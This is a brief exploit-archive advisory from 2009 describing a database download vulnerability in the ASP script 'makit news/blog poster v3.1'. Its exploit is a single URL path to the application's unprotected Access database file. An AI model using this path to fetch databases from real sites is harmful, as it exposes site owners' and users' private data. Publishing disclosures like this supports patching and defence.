id: 10491
date: 12/29/2009
title: makit news/blog poster v3.1 DB Download Vulnerability
author: indoushka
cves: 

=====================================================
makit news/blog poster v3.1 DB Download Vulnerability
=====================================================

========================================================================================                 
| # Title    : Asp makit news/blog poster v3.1 DB Download Vulnerability               |
| # Author   : indoushka                                                               |
| # Script   : makit news/blog poster v3.1                                             |
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       |
| # Bug      : DB                                                                      |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1- http://server/makit/private/news.mdb



#  0day.today [2023-03-24]  #